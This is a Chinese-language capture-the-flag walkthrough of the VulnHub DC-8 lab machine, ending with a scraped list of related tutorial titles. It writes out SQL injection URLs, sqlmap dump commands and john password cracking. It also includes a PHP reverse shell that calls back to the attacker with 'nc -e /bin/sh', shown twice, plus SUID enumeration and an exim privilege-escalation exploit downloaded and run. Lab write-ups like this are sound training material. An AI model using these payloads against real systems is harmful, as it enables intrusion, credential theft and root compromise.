DC-8

DC-8下载:https://download.vulnhub.com/dc/DC-8.zip.torrent

攻击者kali:192.168.1.11

受害者DC-8:192.168.1.8

使用arp-scan -l 扫描出DC-8的IP地址

使用nmap扫描

nmap -sS -A -p- 192.168.1.8

得到22和80端口

进入到web界面

没有具体的重要信息

当点击旁边Details下面的内容的时候发现rul好像有sql注入

尝试手工注入

http://192.168.1.8/?nid=1%20and%20updatexml(1,concat(0x7e,database()),1)#

有注入漏洞

使用sqlmap注入

顺便温习一下sqlmap工具注入使用

sqlmap -u http://192.168.1.8/?nid=1 -–dbs   查看当前数据库

和手工注入一样显示的数据库是  d7db

sqlmap -u http://192.168.1.8/?nid=1 -D d7db --tables 爆出数据库的表

有users表肯定直接爆这个表

爆出 字段

sqlmap -u http://192.168.1.8/?nid=1 -D d7db -T users –dump

得到admin和john账号的hash值

那么接下来尝试使用john来爆一下这两个账号的hash值

john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。 John 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS ,主要目的是破解不够牢固的 Unix/Linux 系统密码

在桌面创建一个dc8.txt的文本将两hash值写入

使用john命令爆

john --wordlist=/usr/share/john/password.lst --rules dc8.txt

得出了一个  turtle ,还有一个半天没出,估计很久

先下一步,扫描一下登录的目录

使用dirb目录扫描工具扫

最后的到的目录是/user

尝试使用admin和john登录

john登录成功

经过一番折腾后发现有可以写php代码的地方

来到这里将shell反弹代码写进去

<p>demon</p>

<?php

system("nc -e /bin/sh 192.168.1.11 4444");

?>

一定要先选PHP然在写代码进去

并且选择php

然后kali开启监听

web页面往下滑找到保存按钮

显示保存成功

点击VIEW

在这个界面填好内容,点击按钮提交

kali接收到反弹

开启交互

python -c 'import pty;pty.spawn("/bin/bash")'

尝试提权

find / -perm -u=s -type f 2>/dev/null

exim4 --version

查看版本是4.89的

漏洞库搜索一下

searchsploit exim 4

直接使用这个4.87 -4.96

cat /usr/share/exploitdb/exploits/linux/local/46996.sh

查看一下脚本

明天写脚本解释

将脚本复制到桌面,命名为DC8shell.sh

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/桌面/DC8shell.sh

在使用vim打开

vim DC8shell.sh

到这里按键盘esc

然后按键盘shift+:

输入set ff=unix

回车,然后保存退出

使用python开启http服务

python -m http.server 8899

开启成功后可以在浏览器打开看看

然后选择刚刚复制的DC8shell.sh路径

回到控制终端

进入到tmp目录

cd /tmp

输入wget将地址粘贴进去,回车

下载成功

chmod 777 DC8shell.sh  给脚本权限

./DC8shell.sh -m netcat   执行脚本

拿到root权限

进入到root目录下拿到flag

DC-8总结

sql手工注入判断是否有sql注入漏洞

sqlmap工具注入使用,得到网站管理员的hash值

john对hash值的爆破使用

dirb目录扫描得到admin登录地址

找到可执行php代码的漏洞地方

使用php代码将shell反弹

<p>demon</p>

<?php

system("nc -e /bin/sh 192.168.1.11 4444");

?>

打开交互模式python -c 'import pty;pty.spawn("/bin/bash")'

尝试提权find / -perm -u=s -type f 2>/dev/null

发现exim4

查看exim4版本号

kali漏洞库查找searchsploit exim 4

查看漏洞脚本并且使用提权

DC-8靶机渗透测试详细教程相关推荐

  1. DC-5靶机渗透测试详细教程

    DC-5 DC-5下载:https://download.vulnhub.com/dc/DC-5.zip.torrent 攻击者kali:192.168.1.9 受害者DC-5:192.168.1.8 ...

  2. DC-9靶机渗透测试详细教程

    DC-9 DC-9下载:https://download.vulnhub.com/dc/DC-9.zip.torrent 攻击者kali:192.168.1.11 受害者DC-9:192.168.1. ...

  3. DC-2靶机渗透测试流程

    目录 一.DC-2靶机搭建 二.收集信息. 三.访问80端口,发现超时. 1.修改hosts文件 2.访问http://dc-2成功. ​四.目录扫描,拿到重要信息. 1.使用kali自带工具dirb ...

  4. DC-3靶机渗透测试

    DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...

  5. 靶机渗透测试(unknowndevice64: 1)

    靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访 ...

  6. Android渗透测试Android渗透测试入门教程大学霸

    Android渗透测试Android渗透测试入门教程大学霸 第1章  Android渗透测试 Android是一种基于Linux的自由及开放源代码的操作系统,主要用于移动设备,如智能手机.平板等.目前 ...

  7. 【2023年最新版】渗透测试入门教程,手把手带你进阶渗透测试工程师,学完即可就业

    前言 学习网络渗透技术是一件靠兴趣驱动的事情,只有强烈热爱一件事才能持之以恒的去做,对于那些三分钟热度的人来说还是劝你放弃吧,因为网络渗透技术自学需要很多方面的知识,没耐心是无法学会的. 当然除了有想 ...

  8. ProE野火4.0+vs2005 Pro/Toolkit 二次开发测试详细教程

    ProE野火4.0+vs2005 Pro/Toolkit 二次开发测试详细教程 2011-04-09 23:02 536人阅读 评论(0) 收藏 举报 Pro/Toolkit可以帮助我们开发出自己需要 ...

  9. 靶机渗透测试(covfefe)

    靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...

最新文章

  1. css之align 与 valign 的用法比较
  2. EXT学习经验分享:深刻理解EXT与服务器端的交互
  3. 《从零开始学keras之神经风格迁移
  4. 数值计算方法(七)——两种消去法求解线性方程组
  5. 从事Web前端开发,必须要知道的这些框架
  6. Ubuntu 截图编辑_编辑截图工具
  7. 2017第25届春季中西部(重庆)医疗器械展览会会刊(参展商名录)
  8. 数据结构实验之二叉树二:遍历二叉树(中序后序遍历)
  9. Photoshop抠图(运用背景橡皮擦工具进行抠图)
  10. 公共教室计算机安全调查报告论文,计算机实习调查报告.docx
  11. 年薪5w和50w的职场人思考力有什么区别
  12. Competition2:HRZ学英语
  13. ICM TSCC视频格式的播放
  14. 电信资费七宗罪,终端的故事
  15. 方框滤波opencv-python
  16. NSSCTF Round#4 Web WP
  17. PL/0 语言简介、PL/0 文法
  18. Springboot美食汇开放平台8ob70计算机毕业设计-课程设计-期末作业-毕设程序代做
  19. 【考研经历】二战终于上岸了,还得继续努力
  20. 医院AI智能随访电话机器人-北京联络加Loojion自主研发

热门文章

  1. java 读取 xml 配置文件内容
  2. Javaweb的AJAX及Axios框架使用(封装AJAX)
  3. 笨方法学python 习题7
  4. 熟练运用计算机的重要性,浅谈计算机教学的重要性
  5. Python:实现A-Star算法(附完整源码)
  6. ajax upload file.js,jquery.ajaxfileupload.js
  7. 蜗居大结局海萍经典台词
  8. 给docker配置个人账号的阿里云镜像加速器以及docker底层原理
  9. 2011年上半学期学习成果及感悟
  10. OpenCV二值化方法